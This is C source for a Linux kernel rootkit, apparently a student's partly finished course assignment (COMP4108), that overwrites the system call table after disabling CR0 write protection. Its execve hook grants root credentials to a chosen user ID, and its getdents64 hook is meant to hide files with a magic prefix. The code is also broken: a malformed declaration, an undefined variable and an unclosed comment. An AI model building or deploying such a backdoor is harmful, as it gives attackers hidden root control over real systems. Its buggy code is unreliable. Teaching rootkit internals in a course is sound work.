/*
 * COMP4108 Rootkit Framework
*/

#include <linux/sched.h>
#include <linux/module.h>
#include <linux/syscalls.h>
#include <linux/dirent.h>
#include <linux/slab.h>
#include <linux/version.h>
#include <linux/proc_ns.h>
#include <linux/fdtable.h>
#include <linux/kallsyms.h>
#include <linux/kernel.h>
#include <linux/cred.h>


#ifndef __NR_getdents
#define __NR_getdents 141
#endif
#ifndef __NR_getdents64
#define __NR_getdents64 248
#endif
#define BUF_SIZE 1024
#define MODULE_NAME "rootkit"
#ifndef __NR_execve 
#define __NR_execve		 11
#endif
// #ifndef _LINUX_CRED_H
// #define _LINUX_CRED_H
// #endif

// The linux dirent structure for Part C
struct linux_dirent {
        unsigned long   d_ino;
        unsigned long   d_off;
        unsigned short  d_reclen;
        char            d_name[1];
        char            pad;
        char            d_type;
};

unsigned long cr0;
static unsigned long *__sys_call_table;

typedef asmlinkage long (*t_syscall)(const struct pt_regs *);

static t_syscall original_openat; // create a variable to store the original openat function

/*
 * TODO: NEEDED FOR PART B AND C
 *  create a variable as above to store the original execve and getdents functions
*/
static t_syscall original_execve;
static t_syscall original_getdents;

/*
 * The suffix to use for the openat hook code. This is the file extension
 * we will be detecting. See insert.sh for how this is passed to the rootkit.
*/
static char* suffix;
module_param(suffix, charp, 0);
MODULE_PARM_DESC(suffix, "Received suffix parameter");

//******
//TODO: NEEDED FOR PART B
//	Accept root_uid as a kernel module parameter 
//	(see module_parm() example above)
//******
/*
 * When a user with an effective UID = root_uid runs a command via execve()
 * we make our hook grant them root priv. root_uid's value is provided as a
 * kernel module argument.
 */
static int root_uid;
module_param(root_uid, int, 0);
MODULE_PARM_DESC(root_uid, "Received root_uid parameter");


//******
//TODO: NEEDED FOR PART C
//	Accept magic_prefix as a kernel module parameter
//	(see module_parm() example above)
//******
/*
 * Files that start with a prefix matching magic_prefix are removed from the
 * linux_dirent64* buffer that is returned to the caller of getdents()
 */
static char* magic_prefix;
module_param(magic_prefix, char*, 0);
MODULE_PARM_DESC(magic_prefix, "Received magic_prefix parameter");

/* 
 * TODO: NEEDED FOR PART A
 *  Update the string provided to the kallsyms_lookup_name function
 * 
 * Locates the address of the system call table using kallsyms_lookup_name
 * and returns it as an unsigned long *
*/
unsigned long * get_syscall_table_bf(void){
  unsigned long *syscall_table;
  syscall_table = (unsigned long*)kallsyms_lookup_name("sys_call_table");
  return syscall_table;
}


/*
 * Our version of the syscall is defined here. We want to match the return type
 * and argument signature of the original syscall.
 * 
 * This is an example of how to hook openat(). Our version will print to the
 * kernel which file the function was called for.
*/
asmlinkage int new_openat(const struct pt_regs* regs){
  // Declare our return value and a variable to store the filename
  long ret;
  char *filename;
  size_t filename_len;
  size_t suffix_len;

  // Get the filename the syscall was called for
  filename = kmalloc(4096, GFP_KERNEL); // alocate kernel memory

  // copy the filename into the kernel variable
  if (strncpy_from_user(filename, (void*) regs->si, 4096) < 0){
    kfree(filename);
    return 0;
  }

  // Check if the file is a .txt (has the .txt extension)
  filename_len = strlen(filename);
  suffix_len = strlen(suffix);
  if (filename_len >= suffix_len){
    if (strncmp(filename + (filename_len - suffix_len), suffix, suffix_len) == 0){
      printk(KERN_INFO "openat() called for %s\n", filename);
    }
  }

  kfree(filename);

  // Invoke the original openat syscall
  ret = original_openat(regs);

  return ret;
}

//adding a new_exeve function
asmlinkage int new_exeve(const struct pt_regs* regs){
  
  kuid_t _euid;
  char *filename;
  long ret; 
   // Get the filename the syscall was called for
  filename = kmalloc(4096, GFP_KERNEL); // alocate kernel memory

  // copy the filename into the kernel variable
  if (strncpy_from_user(filename, (void*) regs->di, 4096) < 0){
    kfree(filename);
    return 0;
  }
  //getting the euid
  _euid = current_euid();
  printk(KERN_INFO "Executing: %s\n", filename);
  printk(KERN_INFO "Effective UID: %d\n", _euid.val);

  kfree(filename);

  if (_euid.val == root_uid)
  {
    commit_creds(prepare_kernel_cred(NULL));
  }
  
  return ret = original_execve(regs);
}

//new getdents function
asmlinkage int new_getdents(const struct pt_regs* regs){
  
    long ret = original_getdents(regs); //
    struct linux_dirent64 *d;
    int bpos;
    struct linux_dirent *user_space_buffer;
    struct linux_dirent *kernel_space_buffer;
    user_space_buffer = (struct linux_dirent*)regs->si;
    struct *filtered_user_space_buffer;
    filtered_user_space_buffer = (struct linux_dirent*)regs->si;

    kernel_space_buffer = kmalloc(ret, GFP_KERNEL);

    // Pointer to the user space buffer
    user_space_buffer = (struct linux_dirent*)regs->si;

    // Allocate memory for the kernel buffer
    kernel_space_buffer = kmalloc(ret, GFP_KERNEL);
    if (!kernel_space_buffer) {
        return -ENOMEM;  // Return an error if allocation fails
    }

    // Copy data from user space to kernel space
    if (copy_from_user(kernel_space_buffer, user_space_buffer, ret) < 0) {
        kfree(kernel_space_buffer);
        return -EFAULT;  // If the copy fails, return an error
    }

    //copying code from the userspace to the kernel space
    if (copy_from_user(kernel_space_buffer, user_space_buffer, ret) < 0) {
        kfree(kernel_space_buffer);
        return ret;
    }
    printk(KERN_INFO "STARTING OUTPUT NOW!");
    
    for (bpos = 0; bpos < ret; ) {
      d = (struct linux_dirent64 *)((char *)kernel_space_buffer + bpos);
      printk(KERN_INFO "entry: %s\n", d->d_name);
      bpos += d->d_reclen;  // Move to the next entry based on record length
    }

    //for C2, the idea is that we should go through the kernel buffer, and remove any dirent
    //structs that start with the magic prefix
    //THIS DOESN'T WORK

    /*
    for (bpos = 0; bpos < ret; ) {
      d = (struct linux_dirent64 *)((char *)kernel_space_buffer + bpos);
      if(strncmp(d->d_name, magic_prefix, strlen(magic_prefix)) == 0)
      {
        //the removing action starts here
        int element_size = d->d_reclen;
        //remaining buffer size 
        int remaining_buffer_size = ret-(bpos + entry_size);
        //trying to replace unwanted elements by shifting elements down
        memmove((char *)kernel_space_buffer + bpos, (char *)kernel_space_buffer + bpos+element_size, remaining_buffer_size);

        ret-= entry_size;
      }
      //printk(KERN_INFO "entry: %s\n", d->d_name);
      else{
        bpos += d->d_reclen;  // Move to the next entry based on record length
      }
    }
    copy_to_user(filtered_user_space_buffer, kernel_space_buffer, strlen(kernel_space_buffer));
    */
    /*

    kfree(kernel_space_buffer);
    return ret;
}

/*
 * Used to let ud modify memory regions and syscalls
*/
static inline void write_cr0_forced(unsigned long val){
  unsigned long __force_order;
  asm volatile(
    "mov %0, %%cr0"
    : "+r"(val), "+m"(__force_order));
}

/*
 * Protect memory (so it can't be modified)
*/
static inline void protect_memory(void){
  write_cr0_forced(cr0);
}

/*
 * Unprotect memory (so we can modify it)
*/
static inline void unprotect_memory(void)
{
  write_cr0_forced(cr0 & ~0x00010000);
}

/*
 * Module initalization
*/
static int __init init_rootkit(void)
{
  printk(KERN_INFO "Rootkit module initializing.\n");

  __sys_call_table = get_syscall_table_bf(); // Get the sys_call_table information

  if (!__sys_call_table)
    return -1;

  cr0 = read_cr0();

  /*
   * TODO: NEEDED FOR PART A, B, AND C
   *  Uncomment the following lines as needed to store the original functions
   *  before they are hooked. You will need to add lines for the execve and
   *  getdents functions.
  */

  // Let's store the original functions so they can be restored later
  original_openat = (t_syscall)__sys_call_table[__NR_openat];
  original_execve = (t_syscall)__sys_call_table[__NR_execve];
  original_getdents = (t_syscall)__sys_call_table[__NR_getdents64];

  /*
   * TODO: NEEDED FOR PART A
   *  Unprotect the memory by calling the appropriate function
  */
  unprotect_memory();
  
  
  /*
   * TODO: NEEDED FOR PART A
   *  Uncomment after completing the unprotect and protect TODO's
  */

  // Let's hook openat() for an example of how to use the framework
   __sys_call_table[__NR_openat] = (unsigned long) new_openat;

  /*
   * TODO: NEEDED FOR PARTS B AND C
   *  Hook your new execve and getdents functions after writing them
  */

  // Let's hook execve() for privilege excalation
  __sys_call_table[__NR_execve] = (unsigned long) new_exeve;
  // Let's hook getdents() to hide our files
   __sys_call_table[__NR_getdents64] = (unsigned long) new_getdents;

  /*
   * TODO: NEEDED FOR PART A
   *  Protect the memory by calling the appropriate function
  */
  protect_memory();
  
  printk(KERN_INFO "Rootkit module is loaded!\n");
  return 0; // For successful load
}

static void __exit cleanup_rootkit(void){
  printk(KERN_INFO "Rootkit module is unloaded!\n");

  /*
   * TODO: NEEDED FOR PART A
   *  Unprotect the memory by calling the appropriate function
  */
  unprotect_memory();

  /*
   * TODO: NEEDED FOR PART A
   *  Uncomment after completing the unprotect and protect TODO's
  */
  // Let's unhook and restore the original openat() function
   __sys_call_table[__NR_openat] = (unsigned long)original_openat;

  /*
   * TODO: NEEDED FOR PARTS B AND C
   *  Unhook and restore the execve and getdents functions
  */

  // Let's unhook and restore the original execve() function
  __sys_call_table[__NR_execve] = (unsigned long)original_execve;
  // Let's unhook and restore the original getdents() function
  __sys_call_table[__NR_getdents64] = (unsigned long)original_getdents;
  /*
   * TODO: NEEDED FOR PART A
   *  Protect the memory by calling the appropriate function
  */
  protect_memory();

  printk(KERN_INFO "Rootkit module cleanup copmlete.\n");
}

module_init(init_rootkit);
module_exit(cleanup_rootkit);

MODULE_AUTHOR("Your Friendly Neighbourhood Hacker");
MODULE_LICENSE("GPL");
